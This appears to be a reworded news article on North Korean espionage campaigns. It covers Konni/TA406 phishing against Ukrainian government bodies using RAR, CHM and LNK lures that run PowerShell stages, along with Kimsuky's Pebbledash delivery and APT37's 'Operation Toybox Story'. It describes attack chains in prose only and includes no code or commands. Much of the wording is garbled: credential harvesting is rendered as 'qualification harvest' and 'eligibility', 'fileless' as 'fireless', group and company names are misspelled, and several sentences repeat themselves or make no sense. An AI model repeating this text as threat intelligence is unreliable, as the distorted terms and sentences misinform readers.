The North Korean-related threat actor known as Konni Apt is attributed to a phishing campaign targeting Ukrainian government agencies, indicating that threat actors are targeting beyond Russia.
The enterprise security company’s proof point said the campaign’s ultimate goal was to gather information about the “trajectory of Russian invasion.”
“The group’s interest in Ukraine follows historical targeting of Russian government agencies for the purposes of strategic intelligence gathering,” security researchers Greg Lesnewich, Saher Nauman and Mark Kelly said in a report shared with Hacker News.
Also known as Opal Sleet, Osmium, Ta406 and Vedalia, Konni Apt is a cyberspy group with a history of targeting targets in South Korea, the US and Russia. It has been operational since at least 2014.
Attack chains attached by threat actors often use phishing emails to distribute malware called Konni Rat (also known as Updog) and redirect recipients to the qualification harvest page. In an analysis of threat groups released in November 2021, Proofpoint rated TA406 as one of several actors that make up the public activity as Kimsky, Thallium and Connie groups.
The latest attacks documented by cybersecurity companies involve the use of phishing emails pretending to be fictional senior fellows at a think tank called the Royal Institute of Strategic Studies, which is also a non-existent organization.
The email message contains a link to a password-protected RAR archive hosted on Mega Cloud Service. Opening the RAR archive using the passwords listed in the message body launches an infection sequence designed to conduct extensive reconnaissance of compromised machines.
Specifically, what is present in the RAR archive is a CHM file that displays decoy content related to former Ukrainian military leader Valeriy Zaluzhnyi. If the victim clicks anywhere on the page, the PowerShell command embedded within the HTML will be executed, reaching out to the external server to download the next stage PowerShell payload.
A newly launched PowerShell script can run various commands to gather information about the system, encode it using Base64-Encoding, and send it to the same server.
“The actor sent multiple phishing emails without clicking the link, asking the target if they received the previous email and if they wanted to download the file,” the researcher said.
Proofpoint also observed that HTML files were distributed directly as attachments to phishing messages. In this variation of the attack, the victim is instructed to click on the built-in link in the HTML file, resulting in a ZIP archive that contains benign PDFs and Windows Shortcuts (LNK) files.
When the LNK is running, it runs base64-encoded PowerShell to drop a JavaScript-encoded file called “themes.jse” using Visual Basic Script. The JSE malware contacts an attacker-controlled URL and executes a response from the server via PowerShell. The exact nature of the payload is currently unknown.
Additionally, TA406 is attempting to gather eligibility by sending fake Microsoft Security Alert messages from your Proton Mail account to Ukrainian government entities, alerting you of suspicious sign-in activity from IP addresses in the US, and prompting you to access the link and confirm your login.
The Credential Harvest Page has not been recovered, but the same compromised domain is said to have been used in the past to collect NAVER login information.
“These qualification harvesting campaigns were conducted prior to attempts to deploy malware and targeted some of the same users who would later be eligible for the HTML distribution campaign,” ProofPoint said. “TA406 is very likely to gather intelligence to help North Korea’s leadership determine current risks to the power that is already in theaters, but it could also help Russia demand more troops and troops.”
“Unlike Russian groups that collect tactical battlefield information and are tasked with targeting Ukrainian forces on the spot, TA406 usually focuses on more strategic political intelligence gathering efforts.”
The Konni Group uses a ZIP archive containing LNK files to link to sophisticated multi-stage malware campaigns targeting sophisticated multi-stage malware campaigns in Korea, so disclosure is made as it runs PowerShell scripts to extract CAB archives and ultimately collects sensitive data and provides batch script malware that can be extended to remote servers.
The findings are also interwoven in a spear phishing campaign organized by Kimsky to target Korean government agencies by delivering steeler malware that can establish command and control (C2 or C&C) communications and establishing files, web browser data, and Cryptocurrency Wallet Information.
According to South Korean cybersecurity company Ahnlab, Kimsky has also been observed to propagate Pebbledash as part of a multi-stage infection sequence initiated via spear phishing. The Trojan horse was attributed to the Lazarus Group from the US government in May 2020.
“Kimsuky Group uses a variety of malware, but in the case of Pebbledash, it runs malware based on the LNK file by Spear-Phishing in the first access phase to launch the attack.”
“The next step is to create a task scheduler using a PowerShell script and register it for autorun. Through communication with Dropbox and TCP socket-based C&C servers, the group installs multiple malware and tools, including Pebbledash.”
Kolni and Kimsky are far from the only North Korean threat actors concentrated in Seoul. Recently in March 2025, it has been found that the Korean entities are on the receivers of another campaign run by APT37. This is also known as Scarcruft.
Called Operation Toybox Story, it has picked out several activists focused on North Korea, according to the Genians Security Center (GSC). The first observed spear fishing attack occurred on March 8, 2025.
“The email contained a dropbox link that led to a compressed archive containing malicious shortcuts (LNK) files,” the Korean company said. “When extracted and executed, the LNK file activated additional malware containing the keyword “toy”. ”
The LNK file is configured to launch the decoy HWP file and run PowerShell commands, leading to the execution of files named TOY03.BAT, TOY02.BAT, and TOY01.BAT.
Rokrat is equipped to collect system information, capture screenshots and use three different cloud services, including PCLoud, Yandex and Dropbox.
“Threat actors continued to modify shortcuts (LNK) files, focusing on fireless attack technology, in order to use legitimate cloud services as C2 infrastructure and avoid detection by anti-virus software installed on target endpoints,” Jenian said.
Source link
